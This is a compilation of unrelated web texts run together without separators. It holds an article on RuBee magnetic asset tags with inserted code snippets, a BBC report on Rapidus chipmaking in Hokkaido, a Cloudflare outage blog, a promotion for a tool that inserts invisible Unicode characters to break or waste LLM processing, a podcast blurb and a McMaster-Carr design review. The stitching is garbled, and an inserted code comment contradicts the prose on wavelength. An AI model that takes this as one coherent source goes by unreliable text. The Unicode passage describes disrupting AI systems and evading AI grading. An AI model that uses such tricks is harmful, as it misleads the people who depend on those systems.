a competitor to technologies like UHF RFID.
There are several differences between RuBee and RFID; for example, RuBee uses
active (battery-powered) tags and the tags are generally powered by a complete
4-bit microcontroller. That doesn't necessarily sound like an advantage, though.
While RuBee tags advertise a battery life of "5-25 years", the need for a battery seems
mostly like a liability. The real feature is what active tags enable: RuBee
operates in the low frequency (LF) band, typically at 131 kHz.
At that low frequency, the wavelength is very long, about 2.5 km. With such a
long wavelength, RuBee communications all happen at much less than one wavelength
in range. RF engineers refer to this as near-field operation, and it has some
properties that are intriguingly different from more typical far-field RF
communications. In the near-field, the magnetic field created by the antenna is
more significant than the electrical field. RuBee devices are intentionally
designed to emit very little electrical RF signal. Communications within a RuBee network are
achieved through magnetic, not electrical fields. That's the core of RuBee's magic.
The idea of magnetic coupling is not unique to RuBee. Speaking of the near-field,
there's an obvious comparison to NFC which works much the same way. The main difference,
besides the very different logical protocols, is that NFC operates at 13.56 MHz.
At this higher frequency, the wavelength is only around 20 meters. The requirement
that near-field devices be much closer than a full wavelength leads naturally to
NFC's very short range, typically specified as 4 cm.
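If you want to see where those numbers come from, a quick back-of-the-envelope check using the free-space relation lambda = c/f reproduces the rough figures above. This is just a sketch of the arithmetic, nothing RuBee-specific:

```go
package main

import "fmt"

// wavelength returns the free-space wavelength in meters for a frequency in Hz,
// using lambda = c / f.
func wavelength(freqHz float64) float64 {
	const c = 299_792_458.0 // speed of light, m/s
	return c / freqHz
}

func main() {
	// RuBee's LF carrier vs NFC's HF carrier. The near-field region only extends
	// to a fraction of a wavelength, which is why a 131 kHz system can couple
	// magnetically over tens of meters while NFC is limited to centimeters.
	fmt.Printf("RuBee, 131 kHz:  lambda = %.1f km\n", wavelength(131e3)/1000) // roughly 2.3 km, the "couple of km" figure above
	fmt.Printf("NFC, 13.56 MHz:  lambda = %.1f m\n", wavelength(13.56e6))     // roughly 22 m
}
```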
At LF frequencies, RuBee can achieve magnetic coupling at ranges up to about 30
meters. That's a range comparable to, and often much better than, RFID inventory
tracking technologies. Improved range isn't RuBee's only benefit over RFID. The
properties of magnetic fields also make it a more robust protocol. RuBee promises
significantly less vulnerability to shielding by metal or water than RFID.
There are two key scenarios where this comes up: the first is equipment stored in
metal containers or on metal shelves, or equipment that is itself metallic. In
that scenario, it's difficult to find a location for an RFID tag that won't suffer
from shielding by the container. The case of water might seem less important, but
keep in mind that people are made mostly of water. RFID reading is often unreliable
for objects carried on a person, which are likely to be shielded from the reader
by the water content of the body.
These problems are not just theoretical. WalMart is a major adopter of RFID inventory
technology, and in early rollouts struggled with low successful read rates. Metal,
moisture (including damp cardboard boxes), antenna orientation, and multipath/interference
effects could cause read failure rates as high as 33% when scanning a pallet of goods.
Low read rates are mostly addressed by using RFID "portals" with multiple antennas.
Eight antennas used as an array greatly increase read rate, but at a cost of over
ten thousand dollars per portal system. Even so, WalMart seems to now target a
success rate of only 95% during bulk scanning.
95% might sound pretty good, but there are a lot of visibility applications where
a failure rate of even a couple percent is unacceptable. These mostly go by the
euphemism "high value goods," which depending on your career trajectory you may
have encountered in corporate expense and property policies. High-value goods
tend to be items that are both attractive to theft and where theft has particularly
severe consequences. Classically, firearms and explosives. Throw in classified
material for good measure.
I wonder if Stevens was surprised by RuBee's market trajectory. He came out of
the healthcare industry and, it seems, originally developed RuBee for cold
chain visibility... but, at least in retrospect, it's quite obvious that its
most compelling application is in the armory.
Because RuBee tags are small and largely immune to shielding by metals, you
can embed them directly in the frames of firearms, or as an aftermarket
modification you can mill out some space under the grip. RuBee tags in
weapons will read reliably when they are stored in metal cases or on
metal shelving, as is often the case. They will even read reliably when a
weapon is carried holstered, close to a person's body.
Since RuBee tags incorporate an active microcontroller, there are even more
possibilities. Temperature logging is one thing, but firearm-embedded RuBee
tags can incorporate an accelerometer (NIST-traceable, VAI likes to emphasize)
and actually count the rounds fired.
Sidebar time: there is a long history of political hazard around "smart guns."
The term "smart gun" is mostly used more specifically for firearms that
identify their user, for example by fingerprint authentication or detection of
an RFID fob. The idea has become vague enough, though, that mention of a
firearm with any type of RFID technology embedded would probably raise the
specter of the smart gun to gun-rights advocates.
Further, devices embedded in firearms that count the number of
rounds fired have been proposed for decades, if not a century, as a means of
accountability. The holder of a weapon could, in theory, be required to
positively account for every round fired. That could eliminate incidents of
unreported use of force by police, for example. In practice I think this is
less compelling than it sounds: simple counting of rounds leaves too many
opportunities to fudge the numbers and conceal real-world use of a weapon as
range training, for example.
That said, the NRA has long been vehemently opposed to the incorporation of any sort of
technology into weapons that could potentially be used as a means of state
control or regulation. The concern isn't completely unfounded; the state of
New Jersey did, for a time, have legislation that would have made user-identifying
"smart guns" mandatory if they were commercially available. The result of
the NRA's strident lobbying is that no such gun has ever become commercially
available; "smart guns" have been such a political third rail that any firearms
manufacturer that dared to introduce one would probably face a boycott by most
gun stores. For better or worse, a result of the NRA's powerful political
advocacy in this area is that the concept of embedding security or accountability
technology into weapons has never been seriously pursued in the US. Even a
tentative step in that direction can produce a huge volume of critical press
for everyone involved.
I bring this up because I think it explains some of why VAI seems a bit vague
and cagey about the round-counting capabilities of their tags. They position it
as purely a maintenance feature, allowing the armorer to keep accurate tabs on
the preventative maintenance schedule for each individual weapon (in armory
environments, firearm users are often expected to report how many rounds
they fired for maintenance tracking reasons). The resistance of RuBee tags
to concealment is only positioned as a deterrent to theft, although the idea
of RuBee-tagged firearms creates obvious potential for security screening.
Probably the most profitable option for VAI would be to promote RuBee-tagged
firearms as a tool for enforcement of gun control laws, but this is
a political impossibility and bringing it up at all could cause significant
reputational harm, especially with the government as a key customer. The result
is marketing copy that is a bit odd, giving a set of capabilities that imply
an application that is never mentioned.
VAI found an incredible niche with their arms-tracking application. Institutional
users of firearms, like the military, police, and security forces, are relatively
price-insensitive and may have strict accounting requirements. By the mid-'00s,
VAI was into the long sales cycle of proposing the technology to the military.
That wasn't entirely unsuccessful. RuBee shot-counting weapon inventory tags were
selected by the Naval Surface Warfare Center in 2010 for installation on SCAR
and M4 rifles. That contract had a five-year term; it's unclear to me if it was
renewed. Military contracting opened quite a few doors to VAI, though, and
created a commercial opportunity that they eagerly pursued.
Perhaps most importantly, weapons applications required an impressive round of
safety and compatibility testing. RuBee tags have the fairly unique distinction
of military approval for direct attachment to ordnance, something called "zero
separation distance" as the tags do not require a minimum separation from
high explosives. Central to that certification are findings of intrinsic safety
of the tags (that they do not contain enough energy to trigger explosives) and
that the magnetic fields involved cannot convey enough energy to heat anything
to dangerous temperatures.
That's not the only special certification that RuBee would acquire. The military
has a lot of firearms, but military procurement is infamously slow and mercurial.
Improved weapon accountability is, almost notoriously, not a priority for the
US military, which has often had stolen weapons go undetected until their later
use in crime. The Navy's interest in RuBee does not seem to have translated to
more widespread military applications.
Then you have police departments, probably the largest institutional owners of
firearms and a very lucrative market for technology vendors. But here we run
into the political hazard: the firearms lobby is very influential on police
departments, as are police unions which generally oppose technical accountability
measures. Besides, most police departments are fairly cash-poor and are not
likely to make a major investment in a firearms inventory system.
That leaves us with institutional security forces. And there is one category
of security force that is particularly well-funded, well-equipped, and
beholden to highly R&D-driven, almost pedantic standards of performance:
the protection forces of atomic energy facilities.
Protection forces at privately-operated atomic energy facilities, such as
civilian nuclear power plants, are subject to licensing and scrutiny by the
Nuclear Regulatory Commission. Things step up further at the many facilities
operated by the National Nuclear Security Administration (NNSA). Protection
forces for NNSA facilities are trained at the Department of Energy's National
Training Center, at the former Manzano Base here in Albuquerque. Concern over
adequate physical protection of NNSA facilities has led Sandia National
Laboratories to become one of the premier centers for R&D in physical security.
Teams of scientists and engineers have applied sometimes comical scientific rigor to "guns,
gates, and guards," the traditional articulation of physical security in the
nuclear world.
That scope includes the evaluation of new technology for the management of
protection forces, which is why Oak Ridge National Laboratory launched an
evaluation program for the RuBee tagging of firearms in their armory. The
white paper on this evaluation is curiously undated, but citations "retrieved 2008"
lead me to assume that the evaluation happened right around the middle of the
'00s. At the time, VAI seems to have been involved in some ultimately unsuccessful
partnership with Oracle, leading to the branding of the RuBee system as Oracle
Dot-Tag Server. The term "Dot-Tag" never occurs outside of very limited materials
around the Oracle partnership, so I'm not sure if it was Oracle branding for
RuBee or just some passing lark. In any case, Oracle's involvement seems to have
mainly just been the use of the Oracle database for tracking inventory data---which
was naturally replaced by PostgreSQL at Oak Ridge.
The Oak Ridge trial apparently went well enough, and around the same time, the Pantex
Plant in Texas launched an evaluation of RuBee for tracking classified tools.
Classified tools are a tricky category, as they're often metallic and often stored
in metallic cases. During the trial period, Pantex tagged a set of sample classified
tools with RuBee tags and then transported them around the property, testing the
ability of the RuBee controllers to reliably detect them entering and exiting areas of
buildings. Simultaneously, Pantex evaluated the use of RuBee tags to track containers
of "chemical products" through the manufacturing lifecycle. Both seem to have
produced positive results.
There are quite a few interesting and strange aspects of the RuBee system, a
result of its purpose-built Visibility Network nature. A RuBee controller can have
multiple antennas that it cycles through. RuBee tags remain in a deep-sleep mode
for power savings until they detect a RuBee carrier during their periodic wake
cycle. When a carrier is detected, they fully wake and listen for traffic. A
RuBee controller can send an interrogate message and any number of tags can respond,
with an interesting and novel collision detection algorithm used to ensure
reliable reading of a large number of tags.
The actual RuBee protocol is quite simple, and can also be referred to as IEEE 1902.1
since the decision of VAI to put it through the standards process. Packets are
small and contain basic addressing info, but they can also contain arbitrary payload in both directions,
perfect for data loggers or sensors. RuBee tags are identified by something that VAI
oddly refers to as an "IP address," causing some confusion over whether or not VAI
uses IP over 1902.1. They don't, I am confident saying after reading a whole lot of
documents. RuBee tags, as standard, have three different 4-byte addresses. VAI refers
to these as "IP, subnet, and MAC,"² but these names are more like analogies.
Really, the "IP address" and "subnet" are both configurable arbitrary addresses,
with the former intended for unicast traffic and the latter for broadcast. For example,
you would likely give each asset a unique IP address, and use subnet addresses for
categories or item types. The subnet address allows a controller to interrogate for
every item within that category at once. The MAC address is a fixed, non-configurable
address derived from the tag's serial number. They're all written in the formats
we associate with IP networks, dotted-quad notation, as a matter of convenience.
And that's about it as far as the protocol specification goes, besides of course the
physical details: a 131,072 Hz carrier, a 1,024 Hz data clock, and either ASK
or BPSK modulation. The specification also describes an interesting mode called
"clip," in which a set of multiple controllers interrogate in exact synchronization
and all tags then reply in exact synchronization. Somewhat counter-intuitively,
this works well: because RuBee controllers can separate out multiple simultaneous
tag transmissions using an anti-collision algorithm based on random phase shifts
by each tag, a room full of RuBee controllers, say an armory, can rapidly
interrogate the entire contents of the room. I think this
feature may have been added after the Oak Ridge trials...
RuBee is quite slow, typically 1,200 baud, so inventorying a large number of assets
can take a while (Oak Ridge found that their system could only collect data on 2-7
tags per second per controller). But it's so robust that it can achieve a 100% read
rate in some very challenging scenarios. Evaluation by the DoE and the military
produced impressive results. You can read, for example, of a military experiment in
which a RuBee antenna embedded in a roadway reliably identified rifles secured in
steel containers in passing Humvees.
Paradoxically, then, one of the benefits of RuBee in the military/defense context
is that it is also difficult to receive. Here is RuBee's most interesting trick:
somewhat oversimplified, the strength of an electrical radio signal goes as 1/r,
while the strength of a magnetic field goes as 1/r^3. RuBee equipment is optimized,
by antenna design, to produce a minimal electrical field. The result is that RuBee
tags can very reliably be contacted at short range (say, around ten feet), but are
virtually impossible to contact or even detect at ranges over a few hundred feet.
To the security-conscious buyer, this is a huge feature. RuBee tags are highly
resistant to communications or electronic intelligence collection.
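As a rough back-of-the-envelope sketch (my own, using only the simplified 1/r versus 1/r³ scaling described above, not any published VAI link budget), the difference in falloff looks like this:

    # Relative signal strength at distance r, normalized to a 10-foot reference.
    def relative_strength(r_ft: float, ref_ft: float = 10.0, exponent: int = 1) -> float:
        return (ref_ft / r_ft) ** exponent

    for r in (10, 30, 100, 300):
        e_field = relative_strength(r, exponent=1)   # radiated electric signal ~ 1/r
        h_field = relative_strength(r, exponent=3)   # near-field magnetic coupling ~ 1/r^3
        print(f"{r:>4} ft: E-field {e_field:.4f}x, magnetic {h_field:.7f}x")

At 300 feet the magnetic coupling has fallen to a few hundred-thousandths of its 10-foot strength, roughly 900 times weaker again than a comparable 1/r signal at the same range, which is exactly the property the security-conscious buyer is paying for.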
Consider the logical implications of tagging the military's rifles. With
conventional RFID, range is limited by the size and sensitivity of the antenna.
Particularly when tags are incidentally powered by a nearby reader, an adversary
with good equipment can detect RFID tags at very long range. VAI heavily references
a 2010 DEFCON presentation, for example, that demonstrated detection of RFID tags
at a range of 80 miles. One imagines that opportunistic detection by satellite is feasible for
a state intelligence agency. That means that your rifle asset tracking is also
revealing the movements of soldiers in the field, or at least providing a way to
detect their approach.
Most RuBee tags have their transmit power reduced by configuration, so even the
maximum 100' range of the protocol is not achievable. VAI suggests that typical
RuBee tags cannot be detected by radio direction finding equipment at ranges
beyond 20', and that this range can be made shorter by further reducing transmit
power.
Once again, we have caught the attention of the Department of Energy. Because of
the short range of RuBee tags, they have generally been approved as not representing
a COMSEC or TEMPEST hazard to secure facilities. And that brings us back to the
very beginning: why does the DoE use a specialized, technically interesting, and
largely unique radio protocol to fulfill such a basic function as nagging people
who have their phones with them? Because RuBee's security properties have allowed it to be
approved for use adjacent to and inside of secure facilities. A RuBee tag, it is
thought, cannot be turned into a listening device because the intrinsic range
limitation of magnetic coupling will make it impossible to communicate with the
tag from outside of the building. It's a lot like how infrared microphones still
see some use in secure facilities, but so much more interesting!
VAI has built several different product lines around RuBee, with names like
Armory 20/20 and Shot Counting Allegro 20/20 and Store 20/20. The founder started
his career in eye health, remember. None of them are that interesting, though.
They're all pretty basic CRUD applications built around polling multiple RuBee
controllers for tags in their presence.
And then there's the "Alert 20/20 DoorGuard:" a metal pedestal with a RuBee
controller and audio announcement module, perfect for detecting government
cell phones.
One of the strangest things about RuBee is that it's hard to tell if it's still
a going concern. VAI's website has a press release section, where nothing has been
posted since 2019. The whole website feels like it was last revised even longer
ago. When RuBee was newer, back in the '00s, a lot of industry journals covered it
with headlines like "the new RFID." I think VAI was optimistic that RuBee could
displace all kinds of asset tracking applications, but despite some special
certifications in other fields (e.g. approval to use RuBee controllers and tags
around pacemakers in surgical suites), I don't think RuBee has found much success
outside of military applications.
RuBee's resistance to shielding is impressive, but RFID read rates have improved
considerably with new DSP techniques, antenna array designs, and the generally
reduced cost of modern RFID equipment. RuBee's unique advantages, its security
properties and resistance to even intentional exfiltration, are interesting but
not worth much money to buyers other than the military.
So that's the fate of RuBee and VAI: defense contracting. As far as I can tell,
RuBee and VAI are about as vital as they have ever been, but RuBee is now installed
as just one part of general defense contracts around weapons systems, armory
management, and process safety and security. IEEE standardization has opened the
door to use of RuBee by federal contractors under license, and indeed, Lockheed
Martin is repeatedly named as a licensee, as are firearms manufacturers with military
contracts like Sig Sauer.
Besides, RuBee continues to grow closer to the DoE. In 2021, VAI appointed Lisa
Gordon-Hagerty to its board of directors. Gordon-Hagerty was undersecretary of
Energy and had led the NNSA until the year before. This year, the New Hampshire
Small Business Development Center wrote a glowing profile of VAI. They described
it as a 25-employee company with a goal of hitting $30 million in annual revenue in the
next two years.
Despite the outdated website, VAI claims over 1,200 RuBee sites in service. I wonder
how many of those are Alert 20/20 DoorGuards? Still, I do believe there are military
weapons inventory systems currently in use. RuBee probably has a bright future, as a
niche technology for a niche industry. If nothing else, they have legacy installations
and intellectual property to lean on. A spreadsheet of VAI-owned patents on RuBee,
with nearly 200 rows, encourages would-be magnetically coupled visibility network inventors
not to go it alone. I just wish I could get my hands on a controller....
Japan's gamble to turn island of Hokkaido into global chip hub
Suranjana Tewari
Asia business correspondent, Hokkaido, Japan
Hokkaido is a tourism and agricultural region, but Rapidus is making chips there too
The island of Hokkaido has long been an agricultural powerhouse – now Japan is investing billions to turn it into a global hub for advanced semiconductors.
More than half of Japan's dairy produce comes from Hokkaido, the northernmost of its main islands. In winter, it's a wonderland of ski resorts and ice-sculpture festivals; in summer, fields bloom with bands of lavender, poppies and sunflowers.
These days, cranes are popping up across the island – building factories, research centres and universities focused on technology. It's part of Japan's boldest industrial push in a generation: an attempt to reboot the country's chip-making capabilities and reshape its economic future.
Locals say that beyond the cattle and tourism, Hokkaido has long lacked other industries. There's even a saying that those who go there do so only to leave.
But if the government succeeds in turning Hokkaido into Japan's answer to Silicon Valley - or "Hokkaido Valley", as some have begun to call it - the country could become a new contender in the $600bn (£458bn) race to supply the world's computer chips.
An unlikely player
At the heart of the plan is Rapidus, a little-known company backed by the government and some of Japan's biggest corporations including Toyota, Softbank and Sony.
Born out of a partnership with IBM, it has raised billions of dollars to build Japan's first cutting-edge chip foundry in decades.
The government has invested $12bn in the company, so that it can build a massive semiconductor factory or "fab" in the small city of Chitose.
In selecting the Hokkaido location, Rapidus CEO Atsuyoshi Koike points to Chitose's water, electricity infrastructure and its natural beauty.
Mr Koike oversaw the fab design, which will be completely covered in grass to harmonise with Hokkaido's landscape, he told the BBC.
Local authorities have also flagged the region as being at lower risk of earthquakes compared to other potential sites in Japan.
A key milestone for Rapidus came with the delivery of an extreme ultraviolet lithography (EUV) system from the Dutch company ASML.
The high-tech machinery helped bring about Rapidus' biggest accomplishment yet earlier this year – the successful production of prototype two nanometre (2nm) transistors.
These ultra-thin chips are at the cutting edge of semiconductor technology and allow devices to run faster and more efficiently.
It's a feat only rival chip makers TSMC and Samsung have accomplished. Intel is not pursuing 2nm; it is leapfrogging from 7nm straight to 1.8nm.
"We succeeded in manufacturing the 2nm prototype for the first time in Japan, and at an unprecedented speed in Japan and globally," Mr Koike said.
He credits the IBM partnership for helping achieve the breakthrough.
Tie-ups with global companies are essential to acquiring the technology needed for this level of chips, he added.
The sceptics
Rapidus is confident that it is on track to mass produce 2nm chips by 2027. The challenge will be achieving the yield and quality that is needed to survive in an incredibly competitive market – the very areas where Taiwan and South Korea have pulled ahead.
TSMC for example has achieved incredible success in mass production, but making high-end chips is costly and technically demanding.
In a 2024 report, the Asean+3 Macroeconomic Research Office highlighted that although Rapidus is receiving government subsidies and consortium members are contributing funds: "The financing falls short of the expected 5 trillion yen ($31.8bn; £24.4bn) needed to start mass production."
The Center for Strategic and International Studies (CSIS) has previously said: "Rapidus has no experience in manufacturing advanced chips, and to date there is no indication that it will be able to access actual know-how for such an endeavour from companies with the requisite experience (ie TSMC and Samsung)."
Finding customers may also be a challenge – Samsung and TSMC have established relationships with global companies that have been buying their chips for years.
The lost decades
Nevertheless, Japan's government is pouring money into the chip industry - $27bn between 2020 and early 2024 - a larger commitment relative to its gross domestic product (GDP) than the US made through the Biden-era CHIPS Act.
In late 2024, Tokyo unveiled a $65bn package for Artificial Intelligence (AI) and semiconductors that could further support Rapidus's expansion plans.
This comes after decades of decline. Forty years ago Japan made more than half of the world's semiconductors. Today, it produces just over 10%.
Many point to US-Japan trade tensions in the 1980s as a turning point.
Naoyuki Yoshino, professor emeritus at Keio University, said Japan lost out in the technology stakes to Taiwan and South Korea in the 1980s, leaving domestic companies weaker.
Unlike its rivals, Japan failed to sustain subsidies to keep its chipmakers competitive.
But Mr Koike says that mentality has changed.
"The [national] government and local government are united in supporting our industry to revive once again."
Rapidus has already achieved a production prototype of a 2nm chip
Japan's broader economic challenges also loom large. Its population is shrinking while the number of elderly citizens continues to surge. That has determined the national budget for years and has contributed to slowing growth.
More than a third of its budget now goes to social welfare for the elderly, and that squeezes the money available for research, education and technology, Prof Yoshino says.
Japan also faces a severe shortage of semiconductor engineers – an estimated 40,000 people in the coming years.
Rapidus is partnering with Hokkaido University and others to train new workers, but agrees it will have to rely heavily on foreigners, at a time when public support for workers coming into the country for employment is low.
Growing an ecosystem
The government's push is already attracting major global players.
TSMC is producing 12–28nm chips in Kumamoto, on the south-western island of Kyushu - a significant step for Japan, even if it lags behind the company's cutting-edge production in Taiwan.
The expansion has transformed the local economy, attracting suppliers, raising wages, and leading to infrastructure and service developments.
Japan's broader chip revival strategy appears to be following a playbook: establish a "fab", and an entire ecosystem will tend to follow.
TSMC started building a second plant on Kyushu in October this year, which is due to begin production by the end of 2027.
Beyond Rapidus and TSMC, local players like Kioxia and Toshiba are also getting government backing.
Kioxia has expanded fabs in Yokkaichi and Kitakami with state funds and Toshiba has built one in Ishikawa. Meanwhile, ROHM has been officially designated as a company that provides critical products under Tokyo's economic security framework.
American memory chipmaker Micron will also receive $3.63bn in subsidies from the Japanese government to grow facilities in Hiroshima, while Samsung is building a research and development facility in Yokohama.
Hokkaido is seeing similar momentum. Chipmaking equipment companies ASML and Tokyo Electron have both opened offices in Chitose, off the back of Rapidus building a production facility there.
"This will make a form of 'global ecosystem'," Mr Koike says, "where we work together to be able to produce semiconductors that contribute to the world."
The CEO of Rapidus says the firm's edge is bespoke chips that can be delivered quickly
Mr Koike said Rapidus's key selling point would be - as its name suggests - an ability to produce custom chips faster than competitors, rather than competing directly with other players.
"TSMC leads the world, with Intel and Samsung close behind. Our edge is speed - we can produce and deliver chips three to four times faster than anyone else. That speed is what gives us an edge in the global semiconductor race," Mr Koike said.
Big bet
Global demand for chips is surging with the rise of AI, while Japan's automakers - still recovering from pandemic-era supply shocks - are pressing for more reliable, domestically or regionally sourced production across the entire supply chain, from raw materials to finished chips.
Securing control over chip manufacturing is being seen as a national security priority, both in Japan and elsewhere, as recent trade frictions and geopolitical tensions between China and Taiwan raise concerns around the risks of relying on foreign suppliers.
"We'd like to provide products from Japan once again – products that are powerful and with great new value," Mr Koike said.
For Japan's government, investing in Rapidus is a high-stakes gamble to revive its semiconductor industry and more broadly its tech power.
And some analysts say it may be the country's best chance to build a domestic ecosystem to supply advanced chips to its many manufacturers, and one day become a formidable challenger in the global market.
Cloudflare, the CDN provider, suffered a massive outage today. Some of the world's most popular apps and web services were left inaccessible for several hours whilst the Cloudflare team scrambled to fix a whole swathe of the internet.
And that might be a good thing.
The proximate cause of the outage was pretty mundane: a bad config file triggered a latent bug in one of Cloudflare's services. The file was too large (details still hazy) and this led to a cascading failure across Cloudflare operations. Probably there is some useful post-morteming to be done about canary releases and staged rollouts.
But the bigger problem, the ultimate cause, behind today's chaos is the creeping centralisation of the internet and a society that is sleepwalking into assuming the net is always on and always working.
It's not just "trivial" stuff like Twitter and League of Legends that were affected, either. A friend of mine remarked caustically about his experience this morning:
I couldn't get air for my tyres at two garages because of cloudflare going down.
Bloody love the lack of resilience that goes into the design when the machine says "cash only" and there's no cash slot.
So flat tires for everyone! Brilliant.
We are living in a society where every part of our lives is increasingly mediated through the internet: work, banking, retail, education, entertainment, dating, family, government ID and credit checks. And the internet is increasingly tied up in fewer and fewer points of failure.
It's ironic because the internet was actually designed for decentralisation, a system that governments could use to coordinate their response in the event of nuclear war. But due to the economics of the internet, and the challenges of things like bots and scrapers, more and more web services are holed up in citadels like AWS or behind content distribution networks like Cloudflare.
Outages like today's are a good thing because they're a warning. They can force redundancy and resilience into systems. They can make the pillars of our society - governments, businesses, banks - provide reliable alternatives when things go wrong.
(Ideally ones that are completely offline)
You can draw a parallel to how COVID-19 shook up global supply chains: the logic up until 2020 was that you wanted your system to be as lean and efficient as possible, even if it meant relying totally on international supplies or keeping as little spare inventory as possible. After 2020 businesses realised they needed to diversify and build slack in the system to tolerate shocks.
In the same way that growing one kind of banana nearly resulted in bananas going extinct, we're drifting towards a society that can't survive without digital infrastructure; and a digital infrastructure that can't operate without two or three key players. One day there's going to be an outage, a bug, or a cyberattack from a hostile state that demonstrates how fragile that system is.
Embrace outages, and build redundancy.
A free tool that stuns LLMs with thousands of invisible Unicode characters
Block AIs from reading your text with invisible Unicode characters while preserving meaning for humans.
How it works:
This tool inserts invisible zero-width Unicode characters between each character of your input text. The text will look the same but will be much longer and can help stop AI plagiarism. It also helps to waste tokens, causing users to run into rate limits faster.
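The tool's source isn't shown here, but the basic idea is easy to sketch in Python (the character set and the number of insertions per gap below are my guesses, not the tool's actual choices):

    import random

    # Zero-width Unicode characters that render as nothing in most fonts.
    ZERO_WIDTH = ["\u200b", "\u200c", "\u200d", "\u2060"]  # ZWSP, ZWNJ, ZWJ, word joiner

    def gibberify(text: str, per_gap: int = 3) -> str:
        """Insert a few invisible characters after every visible character."""
        out = []
        for ch in text:
            out.append(ch)
            out.append("".join(random.choice(ZERO_WIDTH) for _ in range(per_gap)))
        return "".join(out)

    sample = gibberify("Write a 500-word essay on the causes of World War I.")
    print(len(sample))   # several times longer than the visible text
    print(sample)        # looks unchanged on screen

The visible text is untouched; only the token count and the byte length balloon.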
How to use:
This tool works best when gibberifying the most important parts of an essay prompt, up to about 500 characters. This makes it harder for the AI to detect while still functioning well in Google Docs. Some AI models will crash or fail to process the gibberified text, while others will respond with confusion or simply ignore everything inside the gibberified text.
Use cases:
Anti-plagiarism, text obfuscation for LLM scrapers, or just for fun!
Even just one word's worth of gibberified text is enough to block something like Flint AI from grading a session.
‘Enshittification’: how we got the internet no one asked for – podcast
Guardian
www.theguardian.com
2025-11-24 03:00:25
Tech critic Cory Doctorow explains why, for so many, the internet – from Amazon to Google to Instagram – seems to be getting worse.
Do you ever get the feeling that the internet isn’t what it used to be?
Well, tech critic Cory Doctorow thinks you’re right – and he has a term to describe it too: ‘enshittification’.
He lays out his three-step theory to Nosheen Iqbal, explaining why sites from Amazon to Google to Instagram seem to offer a worsening experience … and what can be done to stop it.
McMaster Carr – The Smartest Website You Haven't Heard Of
Most people I know haven't even heard of it, but mcmaster.com is the best e-commerce site I've ever used.
McMaster-Carr is an industrial supply company. They sell nuts, bolts, bushings, bearings – pretty much anything an engineer needs to build stuff. I've purchased from them dozens of times over the past few years, both for personal and school projects.
But what makes their website so great? And why should an industrial supply company have the best e-commerce site on the internet?
mcmaster.com is great because it does what it needs to, and nothing else.
First, let's look at the visual design of the site. Minimal, mostly grayscale, with accents of green and yellow. There are no popups, animations, banners, carousels, or videos – just a calm, static page with categories and a search bar. Even the images are grayscale, to avoid inadvertently catching your eye.
It's not the most visually stunning site, but that doesn't matter here - McMaster has chosen function over form.
A user's goal when they visit McMaster-Carr is to find their part as quickly as possible. The website is designed entirely around that fact. Users rarely come just to browse, so there are no AI recommendation algorithms, featured products, new arrivals – that doesn't make sense in this context. People visit McMaster-Carr with high intent to buy a specific part, that's it.
So how do we get from the 700,000 products in their catalog down to one part? Here's what I do.
Let's say I'm searching for a bolt:
I type "bolt" into the search bar
McMaster shows me several subcategories: hex head, socket head, set screws, etc. I'm looking for socket head, so I select that one.
Now I move my attention to the left nav bar, which shows me several filtering options. Bolts are commonly specified by their thread size (e.g. 1/4"-20) and their length. I'm looking for a 1/4"-20 x 1" bolt, meaning that the bolt's diameter is 1/4" and its length is 1", so I select these filters.
There are over a dozen other filters, such as material, hardness, and head size. Once I've applied enough filters, the main search window shows individual items, rather than subcategories. Here I can select an item and add it to cart.
McMaster's search interface is the main reason for its design superiority. Everything on this page is designed to get you to your part as quickly as possible. The filter sections are simple and elegant, providing schematic illustrations when necessary. The illustrations are always simplified to convey only relevant information, so as not to distract you from the focus of your search.
Results pages also show helpful drop-downs which explain the parts you're looking at. It's like an engineer's handbook and catalog in one. Engineers are often looking up terminology on the fly anyways, so having this information embedded into the site saves valuable time.
McMaster's filters are not only useful for a targeted search, but also for deciding what it is you want. Sometimes I'll search with only a general idea of the part I need, and then I'll use the subcategory descriptions to determine specifics. For example, I may know that I need some type of lock washer, but I'm unsure which one is best for my application. I can use the images and descriptions to decide on the right configuration.
many varieties of lock washers
McMaster is able to provide such intuitive searching and filtering because everything that they sell is highly legible – it's all defined by quantitative specs. There is nothing intangible to deal with, like brands, product photos, or other marketing fluff. Even still, they do a much better job than other industrial websites like Grainger, DigiKey, or Home Depot.
As a point of comparison, Amazon does a terrible job of filtering items. Amazon has an order of magnitude more products on its site, which admittedly makes the job a lot more difficult. However, even generic filters, like price, suck. I won't get too far into my disdain for Amazon's UI design; other people have already written too much about it [1] and that's not the point. But it's interesting to contrast McMaster with what everyone sees as "the" e-commerce site.
Take Amazon's price picker: Why is it two text boxes? Why not a slider? This has always annoyed me, since it's much easier for me to drag a slider than to manually type in my max price. And the quick-select ranges are literally the exact same no matter the product. If I search for a pen, nearly every result I want should be under $25. If I search for a trampoline, every result I want should probably be over $200. What the fuck?! I guess this somehow won the A/B test, but I can't think of a reason why.
Amazon Price Filter
Finally, one of the most brilliant parts of McMaster's product is that for nearly every part, they have a CAD file that you can instantly download into your 3D models. Mechanical engineers mock up designs in CAD programs before actually building them, and having access to pre-modeled parts saves time. (Imagine having to manually model all your nuts and bolts.) McMaster even has extensions for popular CAD programs which allow you to import part files directly, instead of using their website. This makes engineers' lives 10x easier (not to mention making them more likely to purchase from McMaster-Carr). The closest analogy to this is AR try-on, but that's not even very accurate. The point of AR try-on is to determine whether you like the item you're about to buy, whereas the point of McMaster's CAD downloads is to speed up an engineer's workflow. In most cases, they already know which part they need; it's just a matter of completing the CAD model before they can start building the real thing.
Improvements
Mcmaster.com is nearly perfect. It's a website that would make Steve Krug smile. My only suggestion would be to make the search bar on the home page more prominent. It's visually overwhelming to comb through dozens of product photos, so I pretty much always use the search bar to start narrowing down items. The main area of the homepage is effectively dead space, while the search bar is relatively tiny. New users might miss it, wasting time.
I decided to write about McMaster-Carr because it is so rare to see such careful thought go into an industrial web app, far removed from the commotion of Silicon Valley, web3, D2C, and the other typical subjects of pixel perfection.
Mcmaster.com is a product that understands its customer. The minimal, functional design allows users to find their parts as quickly as possible, nothing more or less. It's an unexpected reminder to not get lost in the allure of smooth gradients, 3D animations, or slick fonts, and instead relentlessly focus on what it is your customers really want.
"If something is 100 percent functional, it is always beautiful...there is no such thing as an ugly nail or an ugly hammer but there's lots of ugly cars, because not everything in a car is functional...sometimes it's very beautiful, if the person who designed it has very good taste, but sometimes it's ugly." [2]
Footnotes
